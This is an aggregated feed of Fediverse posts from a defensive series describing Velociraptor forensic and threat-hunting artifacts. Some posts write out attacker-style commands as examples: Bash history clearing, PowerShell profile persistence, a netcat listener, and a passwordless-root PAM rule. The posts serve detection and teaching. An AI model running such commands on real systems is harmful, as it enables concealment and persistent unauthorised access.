#artifactsofautumn — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #artifactsofautumn, aggregated by home.social.
-
@velocidex Thanks, and agreed! I'm planning on getting the posts into a central location soon. Right now, folks can find them via the #ArtifactsOfAutumn tag.
-
🦖Day 92 (THE LAST DAY!) of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange\.Windows.EventLogs.WonkaVision
Link: https://docs.velociraptor.app/exchange/artifacts/pages/windows.eventlogs.wonkavision
----
WonkaVision is a proof of concept (POC) tool to analyze Kerberos tickets and attempt to determine if they are forged (ex. #GoldenTicket), created by @exploitph and @4ndr3w6S.
https://github.com/0xe7/WonkaVision
Presentation:
https://github.com/0xe7/Talks/blob/main/Andrew_Charlie_SANS_Hackfest_2022_revised.pdf----
This artifact can run WonkaVision, then collect its generated Windows event logs. From the event logs, we can detect potentially forged Kerberos tickets.
----
This concludes the #ArtifactsOfAutumn. Hope you enjoyed it, and thanks for all of the support!
#DFIR
#Forensics
#GoldenTicket
#infosec
#ThreatHunting
#WonkaVision -
🦖Day 91 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.IRIS.Sync.Asset
Author: @StephMikiss
Link: https://docs.velociraptor.app/exchange/artifacts/pages/iris.sync.asset
----
This artifact synchronizes clients from Velociraptor to DFIR-IRIS (https://dfir-iris.org/). It will parse available information of clients such as network interfaces, IP addresses, asset type and applied labels.
----
For those unfamiliar with DFIR-IRIS (@dfir_iris), it is a free, open source incident response platform that includes a host of useful and innovative features even many commercial platforms don't possess. Check it out here using the link below!
----
Once a client has been added to DFIR-IRIS, the asset ID from DFIR-IRIS will be added as client metadata and ‘IRIS’ will be added as label.
If a client already possesses an asset ID, it will be updated; in general, labels and the compromised status will by synchronized.
----
This artifact is very powerful due to the fact that we can quickly add clients to DFIR-IRIS from Velociraptor with very little effort.
This means that we can spend less time on managerial tasks, and more time on investigating and remediating the hosts we deem compromised.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 90 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.MacOS.UnifiedLogHunter
Link:
https://docs.velociraptor.app/exchange/artifacts/pages/macos.unifiedloghunter----
With macOS 10.12 (Sierra) came a new way to log system events in a more centralized, unified fashion -- Unified Logs.
Read more here:
These logs can be of great importance to investigators searching for artifacts of adversary activity.
----
@crowdstrike , @Mandiant, and others have done a great job covering the usefulness and technical details surrounding the Unified Logging system.
https://www.crowdstrike.com/blog/how-to-leverage-apple-unified-log-for-incident-response/
https://www.mandiant.com/resources/blog/reviewing-macos-unified-logs
----
This artifact is a wrapper around the 'log' command, allowing defenders to easily review events from the logs from the many subsystems of the Unified Logging infrastructure.
It provides the ability to search using a custom or pre-defined filter, and is great for live hunting.
----
If you are looking to collect only raw files and parse them later, or for a third party tool to process the data, check out the Exchange.MacOS.UnifiedLogParser artifact.
https://docs.velociraptor.app/exchange/artifacts/pages/macos.unifiedlogparser/
----
This information provided by this artifact includes:
- Event time/message/type
- Message type
- Category
- Subsystem
- PID
- Process image Path/UUID
- Sender image Path/UUID
- Sender program counter
- Activity ID
- Parent activity ID----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
@r34p3r @velocidex @mgreen27 @svch0st This is the 89th entry in the series 😀. All of the entries should be accessible using the #ArtifactsOfAutumn tag (here, and previously on Twitter). I plan on compiling them into a single resource at some point after the end of the series.
-
🦖Day 89 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Server.Import.DetectRaptor
Author: @mgreen27, with content references to @svch0st and #Sigma.
Link: https://docs.velociraptor.app/exchange/artifacts/pages/detectraptor
----
DetectRaptor is a collection of publicly available Velociraptor detection content. Most content is managed by a series of CSV files and artifacts are automatically updated.
https://github.com/mgreen27/DetectRaptor
This artifact will import the latest DetectRaptor bundle into the current server.
----
DetectRaptor currently includes the following artifacts:
Windows.Detection.Applications Windows.Detection.BinaryRename
Windows.Detection.Evtx
Windows.Detection.MFT
Windows.Detection.NamedPipes
Windows.Detection.Webhistory
Windows.Detection.ZoneIdentifier
Server.StartHunts----
Most of these artifacts contain content in CSV files that provide for bulk detection capability.
The CSVs can be updated as needed to add new detections.
The artifacts are generated from a VQL template, and the associated CSV via their own Python script.
----
The Server.StartHunts artifact is useful for kicking off hunts for the artifacts within the DetectRaptor hundle.
We can leverage the DetectRaptor bundle in a hunt or single client collection to cast a wide net, then review detection hits for items of interest.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 88 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Linux.System.BashLogout
Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.system.bashlogout
----
This artifact captures information from about Bash logout files for examination of abnormal activity.
Bash logout files are used to run certain commands upon user logout, such as clearing the shell or terminal state.
----
An adversary could leverage this capability to cover their tracks by clearing logs, deleting files, etc.
Once example of this is running the following commands at logout to clear the user's Bash history:
'history -c'
'cat /dev/null > ~/.bash_history'https://attack.mitre.org/techniques/T1070/003/
----
This artifact also includes a content filter ('ContentFilter') to allow for searching for various content within the file.
Additionally, in-scope Bash logout files can be uploaded to the Velociraptor server by checking the box for the 'UploadFiles' option.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 87 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Server.Enrichment.OpenAI
Link: https://docs.velociraptor.app/exchange/artifacts/pages/server.enrichment.openai
----
Have you been enamored with all of the talk of #ChatGPT and #OpenAI, and how it could potentially assist defenders during detection engineering, incident response, or threat hunting?
Now you can experiment with integration of this functionality into Velociraptor!
----
This artifact allows for enrichment of results by querying the OpenAI API.
It leverages the 'text-davinci-003' language model by default, although the model is configurable.
The maximum number of tokens is also configurable, which can affect the response provided by OpenAI.
----
The intention of this artifact is to enrich results from other artifacts, although, it can be used on its own as well.
In one example, we ask if a command line value ('nc -l 1337') is suspicious. 🔍
In another example, we ask about the best features of Velociraptor🦖😃
----
NOTE: You may want to be careful providing sensitive information to OpenAI. However, this artifact can still be used to experiment with potential analysis and investigation improvements. With great power comes great responsibility! 🕷️🕸️
READ:
https://help.openai.com/en/articles/5722486-how-your-data-is-used-to-improve-model-performance----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 86 of the
@velocidex
#velociraptor #ArtifactsOfAutumn seriesArtifact: Windows.Memory.Acquisition
Link: https://docs.velociraptor.app/artifact_references/pages/windows.memory.acquisition
----
This artifact leverages Winpmem to acquire a full memory image of the endpoint.
While it is ideal to process and filter data as quickly as possible on the endpoint, in certain instances it may still be beneficial or necessary to obtain a copy of the endpoint's physical memory.
----
This artifact could also be used in conjunction with the offline collector to obtain a memory image with a triage binary as opposed to requiring a client to be connected to the Velociraptor server.
The image could then be processed with your favorite memory analysis framework.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 85 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.MacOS.Applications.Notes
Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.applications.notes
----
This artifact provides details about notes taken using the default Notes application on macOS.
These notes can be useful during an investigation, especially if tied to interesting files.Deleted notes and attachments can also be recovered in some instances.
----
The information provided by this artifact includes:
- User that created the note
- Note ID/title/text
- Note creation time
- Note modification time
- Note last opened time
- Note folder ID/location
- Attachment name/size/UUIDAttachments can also be uploaded, if desired.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you want to learn more about the macOS Notes database, check out Yogesh Khatri's blog article using the link below!
http://www.swiftforensics.com/2018/02/reading-notes-database-on-macos.html
-
🦖Day 84 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows.NTFS.ADSHunter
Author: @mgreen27
Link:
https://docs.velociraptor.app/artifact_references/pages/windows.ntfs.adshunter----
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every NTFS partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.
Within MFT entries are file attributes, such as Extended Attributes (EA) and Alternate Data Streams or (ADSs) when more than one Data attribute is present. The stream can be used to store arbitrary data (and even complete files).
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.
https://attack.mitre.org/techniques/T1564/004/
----
BitPaymer, a ransomware variant, has been known to leverage ADSs by copying itself to an ADS called ':bin', then creating a process from the stream.
https://attack.mitre.org/software/S0570/
----
This artifact hunts for alternate data streams using a variety of options for targeting, including:
- Directory
- ADS name (inclusion or exclusion)
- ADS Content
- Minimum content size
- Maximum content size
Once found, a stream can also be uploaded to the Velociraptor server.----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to experiment with ADSs for yourself, check out the link to the associated Atomic Red Team tests below!
-
🦖Day 83 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Server.Utils.BackupGCS/S3
Link:
https://docs.velociraptor.app/artifact_references/pages/server.utils.backupgcs/https://docs.velociraptor.app/artifact_references/pages/server.utils.backups3/
----
These artifacts are server monitoring artifacts that will watch for flow completions, then zip and send the results to Google Cloud, or an S3 bucket, using the 'upload_gcs()' and 'upload_s3()' functions.
https://docs.velociraptor.app/vql_reference/plugin/upload_gcs
https://docs.velociraptor.app/vql_reference/plugin/upload_s3
----
Once uploaded, the collections can be left alone and remain archived, or special post-processing can be applied using third-party tools, depending on defenders' needs.
@eric_capuano and @shortxstack (@recon_infosec) did an excellent job presenting about using these artifacts with Timesketch to generate a timeline of events.
If you haven't already, be sure to check out their presentation from @SANS #DFIR Summit 2021!
https://www.sans.org/presentations/breaches-be-crazy/
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 82 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Linux.Forensics.RecentlyUsed
Author: @rxurien
Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.forensics.recentlyused
----
For GNOME-based desktop environments, the '.local/share/recently-used.xbel' file located under each user's home directory can provide valuable information during an investigation, such as a list of recent files accessed by applications, as well as a source of download history.
----
This artifact uses the parse_xml() function to parse the XML-based 'recently-used.xbel' file.
https://docs.velociraptor.app/vql_reference/parsers/parse_xml
----
This information provided by this artifact includes:
- Associated user
- File that was referenced by the application
- Time added, modified, and last visited
- MIME Type
- Application name and CLI arguments/parameters
- Relevant 'recently-used.xbel' file----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to learn more about this technique and others, check out the links below!
-
🦖Day 81 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows\.Persistence\.PowershellRegistry
Link: https://docs.velociraptor.app/artifact_references/pages/windows.persistence.powershellregistry
----
A common way of persistence is to install a hook into a user profile registry hive, using PowerShell. When the user logs in, the PowerShell script downloads a payload and executes it.
https://attack.mitre.org/techniques/T1112/
https://attack.mitre.org/techniques/T1547/001/----
This artifact searches user registry hives for signatures related to general Powershell execution.
A YARA signature is used to target the user’s profile, which is extracted using raw NTFS parsing, in case the user is currently logged on and the registry hive is locked.
----
Once detected, a row is returned and the registry hive is uploaded to the Velociraptor server.
In the provided images, we can see an example using mshta\.exe to execute code.
https://redcanary.com/threat-detection-report/techniques/mshta
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to learn more about this technique and others, check out the link below, as well as it's references!
-
🦖Day 80 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: MacOS.Network\.DHCP
Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.network.dhcp
----
It can be useful to view DHCP lease information on an endpoint.
If the lease length, DHCP server IP address, SSID, or other configuration details are not as expected, it could potentially indicate a rogue DHCP server on the network, or just misconfiguration.
Either way, the information provided by this artifact can be used to help defenders find unexpected DHCP lease configuration, or associate a device and interface to an IP address.
----
The information provided by this artifact includes:
- Which interfaces are using a DHCP lease
- Last modified time of the interface lease file
- Full path to the lease file
- DHCP server address
- SSID
- Assigned IP address
- Lease length
- Least start date----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to learn DHCP-based attacks, such as DHCP spoofing, check out the MITRE ATT&CK article using the link below!
https://attack.mitre.org/techniques/T1557/003/ -
🦖Day 79 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Server.Utils.\ImportCollection
Link: https://docs.velociraptor.app/artifact_references/pages/server.utils.importcollection
----
Velociraptor's offline collector feature is an excellent capability to have when dropping into client environments with little to no previous infrastructure, or when triaging systems that are not easily or immediately connected to a corporate network.
----
Users can leverage the offline collector wizard (that leverages the Server.Utils\.CreateCollector artifact) to quickly create a base collector binary, packed with all of the necessary artifacts and tools for their standard host triage.
From there, defenders simply run the binary and an encrypted ZIP file containing the collection results is created.
Until recently, this ZIP file could be encrypted using a password, but this was not ideal, as the password had to be embedded inside the collector configuration.
This meant that anyone with access to the collector binary could see the password. There have recently been great improvements to the collector, to include PKI. An X.509 certificate (the Velociraptor server's by default), or a public key can now be used to encrypt the ZIP file.
----
What this means is that only the server can un-encrypt the ZIP file, and we can now import encrypted collections automatically, without the need for specifying any password.
Simply point to the encrypted collection ZIP file from the Server.Utils.ImportCollection artifact!
Once imported, we can review the results within the GUI, just like a typical collection.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
If you would like to learn more about the improvements to the offline collections, check out the link below!
https://docs.velociraptor.app/blog/2022/2022-11-21-release-notes/#the-offline-collection-and-encryption -
🦖Day 78 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows.System\.PSReadline
Author: @mgreen27
Link: https://docs.velociraptor.app/artifact_references/pages/windows.system.powershell.psreadline/
----
Adversaries may abuse PowerShell commands and scripts for execution.
In fact, PowerShell is commonly used by attackers across all stages of the attack lifecycle.
They can use PowerShell to perform a number of actions, including discovery of information and execution of code.
----
This artifact will search and extract lines from PSReadline history file.
The PSReadline module is responsible for command history and from Powershell 5 on Windows 10 default configuration saves a copy of the console history to disk.
----
The following parameters are available for use with this artifact:
'SearchStrings' - regex search over a PSReadline line'StringWhiteList' - regex whitelist for results
'UserRegex' - regex search on username
'UploadFiles' - upload in-scope ConsoleHost_history.txt files
----
Here (image), we can see multiple attempts to download and execute a .ps1 file using 'Net.WebClient' through PowerShell.
Our view into the source of 'Default_File_Path\.ps1' and what it does is somewhat hindered, but we can see that the bit.\ly URL contains the text 'L3g1tCrad1e'.
----
If we were to look at what originally happened during the PowerShell session, we would see that in each instance, the Default_File_Path.ps1 file was downloaded and executed 👀
----
These commands were not necessarily malicious, but used for illustrative purposes. If you would like to test these commands for yourself, check out the Atomic Red Team test using the link below!
----
Overall, this artifact includes the following information about the PowerShell console history file:
- Last modified time and other timestamps
- Line number
- Line (commands that were run)
- User
- Path to the PowerShell console history file----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the MITRE ATT&CK page for 'Command and Scripting Interpreter: PowerShell' below!
https://attack.mitre.org/techniques/T1059/001/ -
🦖Day 77 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.Linux.System\.PAM
Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.system.pam
----
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts.
PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services.
----
Malicious modifications to PAM may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.
----
This artifact uses the parse_lines() plugin to parse within the '/etc/pam.d/' directory so that investigators can quickly filter and review the results for relevant or suspicious entries. The 'RecordFilter' parameter can be used to look for specific patterns or strings.
----
Here (results image), we can see an entry in '/etc/pam.d/common-auth' that executes a script called 'toomanysecrets\.sh' upon user login👀. Aside from that, the is also an entry in '/etc/pam.d/su-l' for 'pam_succeed_if' that appears to allow any user escalate to root without the password🥴!
----
For example, executing the command 'su -l root' as 'pbeesly' allows for root access without prompting for a password.
----
If we look at the contents of 'toomanysecrets\.sh', it appears to write to a log file called '/var/log/toomanysecrets.log'.If we look at the content of the log file, we see...usernames...and...passwords! 😵💫
----
Based on what we've found, we can see how useful it can be to have the ability to search the PAM configuration for anomalies, especially across many hosts.
Overall, we can quickly glean the following information from this artifact:
- Last modified time
- File path
- Configuration item----
If you would like to simulate this activity yourself, try out the Atomic Red Team test below!
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md#atomic-test-1---malicious-pam-ruleIf you would like to learn more about how PAM can be abused to gather usernames and passwords at login, check out the following link!
https://book.hacktricks.xyz/linux-hardening/linux-post-exploitation#sniffing-logon-passwords-with-pam----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the MITRE ATT&CK page for 'Modify Authentication Process: Pluggable Authentication Modules' below!
https://attack.mitre.org/techniques/T1556/003/ -
🦖Day 76 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Server.Utils\.SaveFavoriteFlow
Link: https://docs.velociraptor.app/artifact_references/pages/server.utils.savefavoriteflow/
----
Did you know you can save your favorite Velociraptor collections?
It may take a bit of effort to setup and configure an ideal combination of parameters and artifacts within a collection.
This artifact allows the user to save a collection to a 'Favorites' section, for later use.
----
This artifact is typically called by clicking the icon from the "collected" page for a client.
However, this artifact could also be called via the Velociraptor API, or another artifact.
----
Once the 'Save Collection' button/icon has been clicked, a prompt will appear in which users can enter details about the collection.
----
Once saved, the collection can be selected for use.
Simply click the💙icon in the upper right-hand corner of the collection UI to select your favorite collection.
----
After clicking the desired collection, the associated artifacts will be displayed, and the collection can be launched.
----
If you decide you would like to delete a saved collection, you can do so by clicking the trash can icon when a saved collection is selected.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 75 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange.MacOS.Applications\.SavedState
Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.applications.savedstate
----
On macOS, certain application state is stored in '/Users/*/Library/Saved Application State/'.
We can check these files to determine the last time an application was opened, the title of the application window, and when the app/window was later restored (login/reboot).
----
In general, the following has been observed with regard to saved state files:
- The ‘SavedState’ files are created when the application is started.
- SavedState directory - Btime - Last time the application was opened by the user.
- SavedState directory - ModTime - When the application state was last restored (such as after login/reboot).
- .data files - the actual data within the app, such as the scrollback for a Terminal window. The data within can be an (AES-128-CBC) encrypted blob. This data can be decrypted using the appropriate NSDataKey value found in windows.plist.
- windows.plist – contains the name of application windows (NSTitle), and data like:
- NSDataKey - Enc key
- NSDockMenu\.name – names respective to the user’s dock/etc.
- NSWindowID – can used to link the NSDataKey to the PersistentUIRecord value in the .data file(s).----
The information provided by this artifact includes:
- Birth time and modification time of each file
- File name and path
- Dock menu name (where applicable)
- Window title (where applicable)
- Window details (other data, such as enc key and reference to .data file)----
There's a bit to unpack there, but the articles in the links below should provide more of a walkthrough around Saved Application State in macOS.
Thanks, @crowdstrike and @twsecblog !
https://www.crowdstrike.com/blog/reconstructing-command-line-activity-on-macos/
https://www.sans.org/blog/osx-lion-user-interface-preservation-analysis/
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 74 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows[.]Persistence[.]PowershellProfile
Author: @mgreen27
Link: https://docs.velociraptor.app/artifact_references/pages/windows.persistence.powershellprofile/
----
PowerShell supports several profiles depending on the user or host program. Adversaries may create or modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence.
----
When a backdoored PowerShell session is opened, the modified script will be executed unless the '-NoProfile' flag is used upon launch.
An adversary may also be able to escalate privileges if a script in a PS profile is loaded and executed by an account with higher privileges, for example, a domain administrator.
----
In the past, Turla has used PowerShell profiles to maintain persistence on an infected machine.
https://attack.mitre.org/groups/G0010
https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/----
This artifact will search and parse PowerShell profile scripts.
By default, both user and system-wide profiles will be searched. The user can also use regex to target and exclude specific content.
----
Here (image), we can see that the PowerShell profile for the user 'wlambert' specifies that 'Start-Process' should call 'C:\User\Downloads\wlambert\malz.exe'. Again, this would be called every time a PowerShell session is initiated. 👀
----
In this instance, 'malz.exe' is simply a copy of good 'ol calc.exe 😀
----
This profile modification was simulated by running the following commands from a PS session:
- 'Add-Content $profile -Value ""'
- 'Add-Content $profile -value "Start-Process C:\Users\wlambert\Downloads\malz.exe"'The profile content can be checked with 'Get-Content $profile'.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the links below for more information about Powershell Profiles!
Atomic Red Team Test:
https://atomicredteam.io/persistence/T1546.013/#atomic-test-1---append-malicious-start-process-cmdletMITRE ATT&CK Reference:
https://attack.mitre.org/techniques/T1546/013#DFIR
#Forensics
#Infosec
#Persistence
#Windows
#T1546
#T1546.013
#ThreatHunting -
🦖Day 73 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange[.]MacOS[.]System[.]MountedDiskImages
Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.system.mounteddiskimages
----
This artifact enumerates mounted disk images on a macOS endpoint. This can be useful to for determining interaction with a downloaded .dmg file.
Although, the mounting of the file may not necessarily render malicious outcomes to the end user, it does represent a possibility, and further confirms interaction during cases where infection seem likely, or has been confirmed.
----
At any rate, this artifact lets us easily see what disk images are mounted across a fleet of many hosts at once, and provides supplementary data that can be useful for investigation.
----
The information provided by this artifact includes:- Image Path
- Mount point
- Image size
- If image is encrypted
- If image is removable
- If image is writeable----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 72 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange[.]Linux[.]Sys[.]APTHistory
Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.sys.apthistory
----
APT (Advanced Package Tool) maintains a log of software installation/removal/upgrades, as well as associated command-line invocations.
This artifact parses the APT history.log, as well as archived history logs to provide this information.
----
The 'parse_records_with_regex()' plugin and the 'parse_string_with_regex()' function are used to extract relevant log events from the history file(s).
https://docs.velociraptor.app/vql_reference/parsers/parse_records_with_regex/
https://docs.velociraptor.app/vql_reference/parsers/parse_string_with_regex/
----
An adversary could install software for discovery or persistence purposes.
Alternatively, they could remove software for destructive, deterrent, or visibility purposes.
Instead of just listing the installed software, we have more information to provide to an incident responder.
----
Here we can see that 'gdb' was installed by the user 'wlambert'. We can also see that after installation, it was removed.
Aside from user-level events, system-level events such as unattended upgrades are also logged.
----
The information provided by this artifact includes:
- OSPath (History file path)
- Event start date
- Event end date
- Command and arguments
- User ('requested by', where applicable)
- Install/Remove/Upgrade information----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 71 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Server[.]Monitoring[.]ScheduleHunt
Link: https://docs.velociraptor.app/artifact_references/pages/server.monitoring.schedulehunt
----
We may want to run the same hunt at a set interval, such as once a week, at a particular time.
This artifact is a great example of how we can leverage the hunt() function and scheduling through usage of the clock() plugin to accomplish this objective.
----
By default, this artifact runs continuously as a server event artifact, performing a client interrogation at the defined interval, however, this artifact can be copied and modified to hunt for other artifacts.
For example, if we wanted to hunt across many systems for untrusted binaries, we could modify the Server[.]Monitoring[.]ScheduleHunt artifact to call the Windows[.]System[.]UntrustedBinaries artifact.
----
Next, we can specify when we want this hunt to run.
In this case, we want it to run at 3:25 (UTC) every Wednesday.
Finally, we can begin reviewing the results of the hunt once it is scheduled and clients enroll in the hunt. 👀
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 70 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows[.]System[.]UntrustedBinaries
Link: https://docs.velociraptor.app/artifact_references/pages/windows.system.untrustedbinaries
----
There are many binaries and services that make up the majority of the default Windows operating system and provide key services.
Malware may attempt to leverage the names of these binaries/services in order to hide itself in plain sight.
https://attack.mitre.org/techniques/T1036/
----
Malware might name itself svchost.exe so it shows up in the process listing as a benign service, for example.
This artifact checks that the common system binaries are signed.
----
If malware attempts to masquerade one of these processes, it could be easily spotted, since it would not contain proper signing information.
Alternatively, it's important to note that Microsoft does not sign all of its common binaries.
For example, 'conhost.exe' not signed.
----
Regardless, this is a valuable artifact that can quickly identify untrusted software. It also accepts a process regex parameter to suit your own needs.
Here, svchost.exe was found to be untrusted, and running out of 'C:\Windows\Temp\', as opposed to 'C:\Windows\system32\'.
----
The following command was run for simulation purposes:
'./svchost.exe gui --datastore signed-testing'
This command/test used an unsigned Velociraptor binary to mimic an untrusted svchost.exe process.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 69 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange[.]MacOS[.]Applications[.]NetworkUsage
Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.applications.networkusage
----
If an unknown application, or an application that doesn't typically communicate over the network at all suddenly shows signs of large amount of inbound our outbound traffic, it can be considered suspicious.
Similarly, deviations from normal patterns of communication from typical network-connected programs can also be considered suspicious.
----
Either way, we can get an idea of the network traffic to which an application is associated with by gathering the details from the 'netusage.sqlite' database from a macOS host.
In recent version of macOS, this database is located in '/private/var/networkd/db/'.
----
This artifact uses Velociraptor's 'sqlite()' plugin to query the 'netusage.sqlite' database.
https://docs.velociraptor.app/vql_reference/parsers/sqlite/
This particular query will gather information from the 'ZLIVEUSAGE' and 'ZPROCESS' table, and is derived from the mac4n6 APOLLO project:
https://github.com/mac4n6/APOLLO/blob/master/modules/netusage_zliveusage.txt#L75-L91
----
Details provided by this artifact include:
- Timestamp
- First timestamp
- Live usage timestamp
- Bundle ID
- Process name
- WIFI inbound traffic
- WIFI outbound traffic
- Wired inbound traffic
- Wired outbound traffic
- Live usage table ID----
Also, check out the link below to learn more about the 'netusage.sqlite' database!
-
🦖Day 68 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Linux[.]Sys[.]JournalCtl
Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.sys.journalctl
----
This artifact parses the output of the 'journalctl' command. It is used to view systemd logs on a Linux host.
These logs can contain valuable information to incident responders, such as hardware events, kernel messages, network connectivity, service status, and user events.
----
Information provided by this artifact includes:
- Timestamp
- Message
- Boot ID
- Machine ID (h)
- Cursor
- Syslog facility/priority (h)
- Monotonic timestamp (h)
- Transport (h)*h -> column is hidden from the output by default, and can be viewed with the column selector.
----
This artifact could be improved to leverage journalctl's native filtering mechanisms to increase performance, as well as potentially parsing the 'systemd.journal' file directly.
Until then, filtering can be accomplished with Velociraptor's built-in features.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
-
🦖Day 67 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Windows[.]Forensics[.]RecycleBin
Author: @svch0st
Link: https://docs.velociraptor.app/artifact_references/pages/server.orgs.neworg
----
This artifact parses the $I files found in the Windows Recycle Bin folder ($Recycle.Bin, as of Windows Vista) to obtain the time of deletion and the original path and file name.
This folder contains:
- $I files ("Recycled" file metadata)
- $R files (the original data)----
The contents of the Recycle Bin directory are organized by SID ('C:\$Recycle.Bin\%SID%\').
It's important to note that this artifact uses the API to read available $I data. There may be additional unallocated but readable $I files referenced in the MFT that may be recoverable.
----
We can optionally upload recovered files using the 'AlsoUpload' parameter when creating a collection for this artifact.
----
This artifact provides the following information:
- Time when file was deleted
- Name
- Original file path
- File size
- Full path/$I path
- Recycle path/$R path
- Upload details----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the links below for more information about the Recycle Bin in Windows!
https://forensicswiki.xyz/wiki/index.php?title=Windows#Recycle_Bin
https://www.magnetforensics.com/blog/artifact-profile-recycle-bin/ -
🦖Day 66 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Server[.]Orgs[.]NewOrg
Link: https://docs.velociraptor.app/artifact_references/pages/server.orgs.neworg
----
With support for multi-tenancy added to Velociraptor in version 0.6.6, we can now manage multiple organizations within a single Velociraptor deployment.
----
This artifact creates a new organization in a deployment. Upon doing so, the 'OrgId' is used to track information about the new organization.
The current user will be the administrator for this organization.
----
We can switch organizations, by navigating to 'User Settings', then clicking the name of the appropriate organization.
----
To list all created organizations, we can leverage the 'Server[.]Orgs[.]ListOrgs' artifact.
This artifact will list all of the organizations within the deployment, and provides an option to download client configuration files.
----
After creating a new organization and obtaining the client configuration files, we can proceed to add new users to the organization, as well as deploy clients.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the blog article/link below to learn more about the multi-tenancy feature in Velociraptor!
https://docs.velociraptor.app/blog/2022/2022-08-15-release-notes/ -
🦖Day 65 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: MacOS[.]Applications[.]KnowledgeC
Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.applications.knowledgec
----
This artifact parses the KnowledgeC database on macOS endpoints.
The KnowledgeC database can include information such as the following for macOS endpoints:
- Application Usage
- Application Activities
- Safari Browser History
- Device Power Status----
The knowledgeC.db can exist as a SQLite database in the following directories:
- '/private/var/db/CoreDuet/KnowledgeC/'
- '$UserHome/Library/Application Support/Knowledge/'.----
The information provided by this artifact includes:
- Timestamp
- GMT offset
- Day of week
- Start of activity
- End of activity
- Usage (in seconds)
- Stream name/value
- Activity type/value
- Expiration dateThis is all great information to have during an investigation.
----
This artifact currently provides a limited set of information, but further analysis of the KnowledgeC DB columns/tables could improve the context made available from the current information, such as performing user correlation.
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the link below to learn more about the KnowledgeC DB!
-
🦖Day 62 of the @velocidex #velociraptor #ArtifactsOfAutumn series
Artifact: Exchange[.]Windows[.]System[.]VAD
Author: @mgreen27
Link: https://docs.velociraptor.app/exchange/artifacts/pages/windows/system/vad
----
